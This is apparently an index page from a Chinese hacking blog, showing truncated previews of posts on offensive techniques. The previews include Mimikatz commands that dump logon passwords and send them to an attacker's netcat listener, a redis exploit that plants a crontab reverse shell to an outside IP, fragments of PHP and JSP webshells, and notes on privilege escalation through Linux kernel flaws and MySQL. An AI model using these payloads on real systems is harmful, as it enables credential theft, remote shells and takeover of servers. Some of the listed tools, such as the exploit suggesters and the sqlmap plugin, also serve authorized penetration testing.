Mimikatz 使用小技巧

   
分类:安全 | 2016-10-6 | 撸过 5,963 次
0人扯蛋

1.记录 Mimikatz输出:

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:
Attacker执行:

E:\>nc -lvp 4444

Victim执行:

C:\>mi[......]

继续阅读

当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令

   
分类:安全 | 2016-10-6 | 撸过 7,842 次
4人扯蛋
<?php

/*
==============
*/

error_reporting(0);
ini_set('max_execution_time',0);


// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\

/**************** Defines *********************************/

$user = "anlfi";[......]

继续阅读

linux 提权 实战Linux下三种不同方式的提权技巧

   
分类:安全 | 2016-10-3 | 撸过 7,010 次
3人扯蛋

介绍:

渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。

 

实验一:利用Linux内核漏洞提权

VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到
[......]

继续阅读

redis利用姿势收集

   
分类:安全 | 2016-09-25 | 撸过 3,389 次
0人扯蛋

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/c[......]

继续阅读

Linux_Exploit_Suggester — Linux下提权辅助工具

   
分类:安全 | 2016-09-24 | 撸过 2,572 次
0人扯蛋

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。

例子:

$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0

Kernel local: 3.0.0

Possible Exploits:
[+] semtex
   CVE-2013-2094
   Source: www.exploit-db.com/download/25444/‎
[+] memodipper[......]

继续阅读

Windows-Exploit-Suggester --- Windows下提权辅助工具

   
分类:安全 | 2016-09-24 | 撸过 3,328 次
0人扯蛋

此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。

描述

该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。

同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库,并将其以Excel表格的形式保存。

需要注意的是,此工具首先会假定目标系统存在所有漏洞,然后再基于系统补丁情[......]

继续阅读

MYSQL提权总结

   
分类:安全 | 2016-07-16 | 撸过 4,128 次
0人扯蛋

最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。
一、利用mof提权

前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下:
Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式[......]

继续阅读

菜刀Jsp脚本增强版

   
分类:安全 | 2016-07-14 | 撸过 10,384 次
5人扯蛋

某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。
 
修复BUG:
 

1、初始化获取容器绝对路径错误如:原本路径是D:\wooyun菜刀连接默认跳转到了:D:\wooyun\wooyun目录。
2、修改了无法连接Oracle数据库问题
3、修改了远程下载代码
4、重新压了下代码

 

新的服务器端代码如下:

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>[......]

继续阅读

BurpSuite集成Sqlmap神器!

   
分类:工具 | 2016-06-30 | 撸过 2,179 次
0人扯蛋

设置很简单,这个已经是编译好的,只要在:extender-->extentions-->add 添加jar就OK了!

不过需要BurpSuite需要放到sqlmap根目录下!

本插件实现原理:

将目标请求的数据存放到临时文件中,然后调用"sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如:
加入配置中写:"--level 3",真实执行时是:sqlmap.py -r $file --level 3
回到burpsuite主页面,在任何请求连接上右键,会看到新增"send to Sqlmap",点击后会开启cmd窗口,针对此请求进行sql注入检测

设置sqlmap参数:
[......]

继续阅读

韩国挫败了朝鲜黑客大规模网络攻击

   
分类:新闻 | 2016-06-29 | 撸过 1,421 次
0人扯蛋

最近的一份报告显示,朝鲜黑客入侵了超过160个韩国政府机构和企业的14万台计算机,并涉嫌在系统中种植了恶意软件,为其大规模的网络攻击做准备。

韩国调查朝鲜黑客行为

路透社报道,韩国警方对朝鲜黑客的网络攻击行为一直保持高度警戒,特别是朝鲜在1,2月份进行小型化氢弹试验和远程火箭试验之后。

韩国警察厅网络调查科表示,警方获得恶意代码情报之后展开了调查,结果发现一些大型企业,公共组织和政府机构在内的160多个机构使用的一款网络管理软件被朝鲜黑客攻破。该网络管理软件是由一家民间企业开发的,通过该系统,管理员可以远程操控多台电脑,统一进行软件升级和维护。而朝鲜黑客发现了这套系统中的漏洞,进而控制了[......]

继续阅读